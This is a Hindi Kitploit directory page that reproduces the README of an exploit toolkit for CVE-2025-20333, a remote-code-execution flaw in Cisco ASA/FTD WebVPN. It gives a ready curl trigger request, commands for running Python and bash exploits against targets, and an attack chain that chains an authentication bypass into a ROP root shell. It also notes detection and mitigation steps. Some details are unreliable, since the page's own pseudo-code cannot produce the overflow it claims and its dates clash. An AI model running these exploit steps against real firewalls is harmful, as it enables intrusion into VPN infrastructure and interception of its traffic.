Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-20333 — CVE-2025-20333 के लिए संपूर्ण शोध और शोषण टूलकिट, जो Cisco ASA/FTD WebVPN में एक गंभीर स्टैक बफर ओवरफ्लो है। इसमें विस्तृत बाइनरी विश्लेषण, Python और bash में PoC एक्सप्लॉइट, और शोषण मार्गदर्शिका शामिल है। | Kitploit
उपकरण/GitHubGitHub/cobbbex/cve-2025-20333
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगबाइनरी शोषण
GitHubcobbbex/cve-2025-20333

cve-2025-20333

CVE-2025-20333 के लिए संपूर्ण शोध और शोषण टूलकिट, जो Cisco ASA/FTD WebVPN में एक गंभीर स्टैक बफर ओवरफ्लो है। इसमें विस्तृत बाइनरी विश्लेषण, Python और bash में PoC एक्सप्लॉइट, और शोषण मार्गदर्शिका शामिल है।

रिपॉजिटरी देखें
1323 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-20333 - संपूर्ण अनुसंधान एवं शोषण टूलकिट

अवलोकन

इस निर्देशिका में CVE-2025-20333 के लिए व्यापक अनुसंधान, विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट कोड शामिल है, जो Cisco ASA/FTD WebVPN सर्वरों में एक गंभीर स्टैक बफर ओवरफ्लो भेद्यता है।

स्थिति: ⚠️ जंगल में सक्रिय रूप से शोषित (ArcaneDoor अभियान)
CVSS स्कोर: 9.8 गंभीर
प्रमाणीकरण: नहीं (CVE-2025-20362 के माध्यम से बायपास)
प्रभाव: रूट के रूप में रिमोट कोड निष्पादन


सामग्री

📚 दस्तावेज़ीकरण

CVE-2025-20333-RESEARCH-NOTES.md (20 KB)

संपूर्ण रिवर्स इंजीनियरिंग अनुसंधान

  • भेद्यता संदर्भ और वेब खुफिया
  • बाइनरी विश्लेषण (ASA 9.12.4.x lina प्रक्रिया)
  • अनुरोध-अंतर्ग्रहण परत ऑडिट
  • Lua API बाइंडिंग विश्लेषण
  • 🎯 ओवरफ्लो खोज (body_lexer.re2c, FUN_0302e690)
  • हमले की श्रृंखला का विवरण
  • कोड पैटर्न के साथ मूल कारण विश्लेषण
  • उपकरण और पता संदर्भ तालिका

मुख्य निष्कर्ष:

root@kitploit:~
body_lexer.re2c में फिक्स्ड 16-बाइट बफर (local_58[16])
URL-डिकोडिंग लूप में कोई बाउंड्स चेक नहीं है
iVar11 < 16 की जाँच किए बिना local_58[iVar11] में लिखना
8 हेक्स जोड़े के बाद: ओवरफ्लो → स्टैक भ्रष्टाचार → RCE

EXPLOITATION-GUIDE.md (12 KB)

व्यावहारिक शोषण मैनुअल

  • भेद्यता तंत्र समझाया गया
  • संपूर्ण हमला श्रृंखला (CVE-2025-20362 बायपास + ओवरफ्लो)
  • चरण-दर-चरण शोषण वॉकथ्रू
  • पेलोड निर्माण तकनीकें
  • नेटवर्क-आधारित पहचान विधियाँ
  • होस्ट-आधारित पहचान और लॉग विश्लेषण
  • शमन रणनीतियाँ
  • पैच किए गए संस्करण और अपग्रेड पथ
  • कानूनी और नैतिक विचार

🔧 प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट्स

cve-2025-20333-poc.py (15 KB)

पूर्ण-विशेषताओं वाला Python एक्सप्लॉइट

विशेषताएँ:

  • स्वचालित पेलोड निर्माण
  • CVE-2025-20362 पाथ ट्रैवर्सल एकीकरण
  • ROP गैजेट श्रृंखला निर्माण
  • SSL/TLS समर्थन
  • कॉन्फ़िगर करने योग्य टाइमआउट
  • विस्तृत प्रगति रिपोर्टिंग

उपयोग:

root@kitploit:~
# भेद्यता विवरण दिखाएँ
python3 cve-2025-20333-poc.py --details

# लक्ष्य का शोषण करें
python3 cve-2025-20333-poc.py 192.168.1.100 443

# कस्टम सेटिंग्स
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh (8.5 KB)

हल्का bash एक्सप्लॉइट

विशेषताएँ:

  • कोई Python निर्भरता नहीं
  • curl या netcat का उपयोग करता है
  • न्यूनतम संसाधन पदचिह्न
  • शैक्षिक टिप्पणियाँ
  • स्पष्ट स्थिति आउटपुट

उपयोग:

root@kitploit:~
# विवरण दिखाएँ
./cve-2025-20333-poc.sh --details

# शोषण
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# curl के साथ मैनुअल
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

भेद्यता सारांश

त्वरित तथ्य

गुणमान
CVE IDCVE-2025-20333
प्रकारस्टैक बफर ओवरफ्लो (CWE-120)
घटकbody_lexer.re2c (FUN_0302e690)
प्रभावित संस्करणASA 9.16–9.23, FTD 7.0–7.7
CVSS v3.19.8 (गंभीर)
प्रमाणीकरणआवश्यक नहीं (CVE-2025-20362 के माध्यम से)
उपयोगकर्ता सहभागिताकोई नहीं
प्रभावरूट के रूप में RCE, पूर्ण सिस्टम समझौता
स्थितिसक्रिय रूप से शोषित (मई 2025+)
जिम्मेदार प्रकटीकरणCisco ने पैच किया; सलाह प्रकाशित

मूल कारण

root@kitploit:~
// body_lexer.re2c - URL-डिकोडिंग लूप
byte local_58[16];  // ← फिक्स्ड 16-बाइट बफर

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← कोई बाउंड्स चेक नहीं!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

ओवरफ्लो ट्रिगर: POST बॉडी में 9+ लगातार %XX अनुक्रम

हमला श्रृंखला

root@kitploit:~
1. हमलावर (कोई प्रमाणीकरण आवश्यक नहीं)
   ↓
2. HTTP POST to /+CSCOU+/../+CSCOE+/files/file_list.json
   ├─ CVE-2025-20362: पाथ ट्रैवर्सल प्रमाणीकरण जाँच को बायपास करता है
   └─ files_retr.lua एंडपॉइंट तक पहुँचता है (auth_flag = 0)
   ↓
3. POST बॉडी: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9+ URL-एन्कोडेड जोड़े)
   ↓
4. body_lexer.re2c POST बॉडी को संसाधित करता है
   ├─ हेक्स जोड़े को local_58[16] में जमा करता है
   └─ 8 जोड़े के बाद: ओवरफ्लो!
   ↓
5. स्टैक भ्रष्टाचार
   ├─ local_48, local_40 को अधिलेखित करता है
   ├─ सहेजे गए RBP को अधिलेखित करता है
   └─ सहेजे गए RIP (रिटर्न पता) को अधिलेखित करता है
   ↓
6. नियंत्रण प्रवाह अपहरण
   ├─ RIP ROP गैजेट्स की ओर इशारा करता है
   ├─ ROP श्रृंखला execve() सेट करती है
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. रूट के रूप में RCE (lina प्रक्रिया रूट के रूप में चलती है)
   ├─ पूर्ण VPN सर्वर समझौता
   ├─ सभी VPN ट्रैफ़िक तक पहुँच
   └─ NVRAM संशोधन के माध्यम से स्थिरता

अनुसंधान प्रक्रिया

चरण 1: बाइनरी विश्लेषण ✅

  • Ghidra में lina बाइनरी खोला
  • WebVPN अनुरोध वास्तुकला मैप की (HTTP पार्सर, URL राउटर, 13 एंडपॉइंट हुक)
  • अनुरोध-अंतर्ग्रहण परत का ऑडिट किया (सभी clString/सटीक-आकार आवंटन के माध्यम से सुरक्षित)
  • Lua API बाइंडिंग की जाँच की (सभी सुरक्षित)

चरण 2: वेब खुफिया ✅

  • CVE-2025-20333 तकनीकी विवरण खोजा
  • Rapid7, Zscaler, Horizon3, Tenable विश्लेषण मिला
  • हमले की श्रृंखला /+CSCOU+/../+CSCOE+/files/file_list.json का उपयोग करती है, इसकी पुष्टि की
  • मूल कारण की पहचान की: Lua एंडपॉइंट में हीप-आधारित (वेब स्रोत) / स्टैक-आधारित (यह बाइनरी) ओवरफ्लो

चरण 3: लक्षित रिवर्सिंग ✅

  • body_lexer.re2c (FUN_0302e690) को डीकंपाइल किया
  • पाया: बाउंड्स चेकिंग के बिना फिक्स्ड 16-बाइट बफर local_58[16]
  • ओवरफ्लो पथ की पुष्टि की: URL-डिकोडिंग लूप → असीमित लेखन
  • पहुँच क्षमता सत्यापित की: files_retr.lua → body_lexer → स्टैक ओवरफ्लो

चरण 4: एक्सप्लॉइट विकास ✅

  • ROP श्रृंखला समर्थन के साथ Python PoC बनाया
  • न्यूनतम वातावरण के लिए bash PoC बनाया
  • पेलोड संरचना और निर्माण तकनीकों का दस्तावेज़ीकरण किया
  • पहचान और शमन मार्गदर्शन शामिल किया

उपयोग निर्देश

अधिकृत पेनेट्रेशन टेस्टिंग के लिए

  1. प्राधिकरण सत्यापित करें

    • परीक्षण के लिए लिखित अनुमति प्राप्त करें
    • लक्ष्य सिस्टम विवरण की पुष्टि करें (IP, पोर्ट, संस्करण)
    • दायरा और समयरेखा दस्तावेज़ित करें
  2. एक्सप्लॉइट चलाएँ

    root@kitploit:~
    # त्वरित जाँच: क्या लक्ष्य शोषण प्रयास का जवाब देता है?
    python3 cve-2025-20333-poc.py <target_ip>
    
    # या bash संस्करण:
    ./cve-2025-20333-poc.sh <target_ip>
    
  3. शोषण सत्यापित करें

    • शेल एक्सेस / रिवर्स शेल कनेक्शन की जाँच करें
    • क्रैश या विसंगतियों के लिए सिस्टम लॉग की जाँच करें
    • संशोधित फ़ाइलों के लिए स्कैन करें (NVRAM, स्थायी बैकडोर)
  4. निष्कर्ष दस्तावेज़ित करें

    • लक्ष्य संस्करण, पैच स्तर रिकॉर्ड करें
    • शोषण सफलता/विफलता दस्तावेज़ित करें
    • सामने आई किसी भी रक्षात्मक उपाय को नोट करें
    • उपचार सिफारिशों के साथ ग्राहक को रिपोर्ट करें

सुरक्षा अनुसंधान के लिए

  1. अनुसंधान नोट्स पढ़ें

    • CVE-2025-20333-RESEARCH-NOTES.md का अध्ययन करें
    • बाइनरी वास्तुकला और ओवरफ्लो तंत्र को समझें
  2. PoCs का अध्ययन करें

    • ROP गैजेट निर्माण के लिए Python PoC की समीक्षा करें
    • न्यूनतम एक्सप्लॉइट के लिए bash PoC की समीक्षा करें
    • पेलोड एन्कोडिंग को समझें
  3. अनुकूलित करें और विस्तारित करें

    • कस्टम शेलकोड जोड़ें
    • विभिन्न शोषण तकनीकों को लागू करें
    • पैच किए गए बनाम कमजोर संस्करणों पर परीक्षण करें

महत्वपूर्ण चेतावनियाँ

⚠️ कानूनी सूचना

यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

  • न करें स्पष्ट लिखित अनुमति के बिना सिस्टम के खिलाफ उपयोग
  • न करें दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग (डेटा चोरी, सेवा व्यवधान, रैंसमवेयर)
  • अनधिकृत पहुँच कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (USA) और दुनिया भर के समान कानूनों का उल्लंघन करती है
  • दंड में आपराधिक अभियोजन, जुर्माना और कारावास शामिल हैं

✅ अधिकृत उपयोग:

  • लिखित अनुमोदन के साथ पेनेट्रेशन परीक्षण
  • भेद्यता अनुसंधान के दौरान प्रूफ-ऑफ-कॉन्सेप्ट
  • आंतरिक सुरक्षा परीक्षण
  • CTF प्रतियोगिताएँ
  • शैक्षणिक अनुसंधान

❌ निषिद्ध उपयोग:

  • अनुमति के बिना सिस्टम पर हमला करना
  • रैंसमवेयर तैनाती
  • डेटा चोरी या जबरन वसूली
  • सेवा व्यवधान
  • समझौता किए गए नेटवर्क में पार्श्व गति

फ़ाइल मेनिफेस्ट

root@kitploit:~
cve-2025-20333/
├── README.md                              (यह फ़ाइल)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB, व्यापक अनुसंधान)
├── EXPLOITATION-GUIDE.md                 (12 KB, व्यावहारिक मार्गदर्शिका)
├── cve-2025-20333-poc.py                 (15 KB, Python PoC)
└── cve-2025-20333-poc.sh                 (8.5 KB, bash PoC)

कुल दस्तावेज़ीकरण: ~65 KB
अनुसंधान गहराई: 50+ Ghidra फ़ंक्शन ऑडिट किए गए
सत्यापित निष्कर्ष: body_lexer.re2c में बफर ओवरफ्लो की पुष्टि हुई


त्वरित संदर्भ

भेद्यता त्वरित परीक्षण

root@kitploit:~
# परीक्षण करें कि क्या लक्ष्य शोषण के लिए कमजोर है
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# यदि लक्ष्य जवाब देता है (200, 500, क्रैश), यह कमजोर हो सकता है
# यदि लक्ष्य ब्लॉक/रीडायरेक्ट करता है, यह पैच किया जा सकता है

संस्करण जाँच

root@kitploit:~
# कमजोर संस्करण:
# - Cisco ASA 9.16 से 9.23
# - Cisco FTD 7.0 से 7.7

# ASA संस्करण जाँचने के लिए SSH/कंसोल का उपयोग करें:
show version

# पैच किए गए संस्करण:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (पैच किए गए)

शमन चेकलिस्ट

  • ASA/FTD संस्करण सत्यापित करें
  • उपलब्ध पैच की जाँच करें
  • कमजोर होने पर पैच किए गए संस्करण में अपग्रेड करें
  • IP पते द्वारा WebVPN पहुँच प्रतिबंधित करें
  • लॉगिंग और निगरानी सक्षम करें
  • CVE-2025-20362 पाथ ट्रैवर्सल प्रयासों पर नज़र रखें
  • DoS पैटर्न (lina क्रैश) के लिए निगरानी करें
  • WebVPN पोर्ट पर फ़ायरवॉल सुरक्षा सक्षम करें

संदर्भ

  • Cisco सुरक्षा सलाह: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Rapid7 विश्लेषण: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

अस्वीकरण

यह टूलकिट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए AS-IS प्रदान किया गया है।

  • अपने जोखिम पर उपयोग करें
  • दुरुपयोग के लिए कोई वारंटी या दायित्व नहीं
  • अनधिकृत पहुँच अवैध है
  • Cisco और प्रभावित संगठनों को जिम्मेदारी से निष्कर्ष रिपोर्ट करें
  • अपने देश के साइबर सुरक्षा कानूनों का पालन करें


श्रेय

इस परियोजना को Claude Code, Anthropic के AI-संचालित कोडिंग सहायक की सहायता से विकसित किया गया था।


निर्मित: 2026-08-23
अनुसंधान अवधि: 2026-08-22 से 2026-08-23
स्थिति: पूर्ण और दस्तावेज़ित
वर्गीकरण: शैक्षिक / केवल अधिकृत परीक्षण

टूल डाउनलोड करें